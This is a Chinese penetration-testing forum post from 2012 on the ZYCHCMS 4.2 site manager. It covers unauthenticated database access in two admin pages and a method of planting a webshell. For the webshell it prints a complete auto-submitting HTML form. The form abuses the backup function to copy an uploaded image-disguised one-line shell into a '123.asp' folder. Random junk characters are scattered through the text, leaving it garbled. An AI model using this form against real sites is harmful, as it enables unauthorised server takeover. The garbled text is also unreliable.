中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
% a. v% R9 i4 ?& a/ c7 `) c
( z% }% P& V0 p( H5 a
. R) e- B1 v6 |
! @: i+ X$ ?( ?+ v- F1 x
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
( s1 Q+ i6 ^# P* Z8 I+ q; A
①SQL注射漏洞
0 o c' P4 {3 `6 Y
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
3 [: k4 Z2 d# w
漏洞原因:未过滤
6 d& {" U, X! V% S4 [3 U( Y
漏洞代码:
3 u! r* ^/ b2 u7 r# R
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
: I) b# R7 _3 j$ d- x' c8 I @- F
修复方法:在文件开头加入代码
- l/ A4 r4 o2 e! f/ V; v
0 m$ i; u d! c- Q- B
# i! i% h7 Q0 ~$ V, y7 l
②后台拿WBSHELL
. h/ v/ W) ^3 q7 x% o- c1 ]2 [
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
1 H3 F' H. d0 t
这里在网上找了一个,改了下,将就着用。
$ U' W& _* ~+ p' _+ k3 i0 u: z! p& r
以下是代码本地提交代码
/ J w; Q1 i& r0 _% e% g9 T/ C: J
* a1 g$ d. r* A' }1 _$ B: n! P
& K, I# I6 B, s$ C: i/ d
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
9 z5 \2 C) J6 o/ ^ Q
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
/ k4 P+ V- ?0 X8 W. v
<tr>
3 m' b$ ~% k: |/ s8 }$ n' Z
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
3 }) z @9 R; }2 g5 ~- h- n
</tr>
$ S5 O. R* A, i, K2 k' m, Q
<tr>
- C7 B6 r# }1 d! f+ N p6 `' ~
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
- o- r1 e2 i) L$ K3 c
</span>
4 [' W% n1 f9 g
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
5 a7 n2 j- p t
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
$ [- B8 W. x" u) f1 M" x% C
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
0 O0 }: c, z/ p0 m' R
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
( w7 v& n* k! Z0 O& |) M- i+ y
<div align=”left”>
0 \+ N* N/ Q) ~2 u* i% `9 }- F
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
' p" W4 y# h; a! }! ^
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
8 \0 j6 z" y: W9 a9 g
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
9 a5 I5 n6 Z; K: X
</div></td>
: g& e: g5 ^7 _$ E
</tr>
- o7 v# z5 M' ?$ P1 Q
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
?4 m! A. T, j7 H1 n
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
' D( m |/ P# W! e" `
<td class=”td”><div align=”left”>
r+ D' `2 N$ d" f& [
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
- Q7 M/ V0 ?9 e. L
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
9 O4 `7 y1 e) y) p. D4 L
</tr>
) h& A s/ }4 r0 f" a5 _
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
9 E: q' `- B0 Y
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
2 j+ i7 a9 O. d1 ?. [" Z
<td class=”td”><div align=”left”>
5 w9 @1 ?3 F& a" K4 k; n
<input type=”submit” value=”确定备份” class=”btn”
1 _1 b1 m4 p. m$ j5 f# K2 t
</div></td>
, q/ R2 Z8 g0 j
</tr>
. ?% \( ?' x) y% c
</table></td></tr></form>
) A4 k, x2 o/ r, c1 w7 |
</table>
1 H2 C- L" n+ m, R! D0 `' l
</td>
1 k/ D }/ E1 d9 Q4 ]4 f
</tr>
" b' T Z# V2 Z/ P# Y
</table>
" M" w4 N2 c9 u9 g
<script>
0 _/ [$ o( S' P1 x
document.all.add.submit();
( e" m/ G3 E" r: t9 \3 b
</script>
) A' A& u; E8 x7 u' D" b- o% O
/ u* Y9 _, m# j. B
8 \+ R5 n$ p$ h1 b0 g( D- @
- B( ]4 i8 b* l' ?* g% v p
+ H1 y9 m9 I8 m( y% ]# N P! W
8 J' ^- A/ y% A* j$ x1 v% g
. k) G T$ L% q6 x3 a
; H( t' j4 M0 b! F3 _. b$ [( z- Z& E9 x
: w# i) l% X8 n5 g) h
' j! y- y/ _( d6 }+ M( I$ k# [
. d$ ?5 i6 K" K* ^- V; {2 m
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2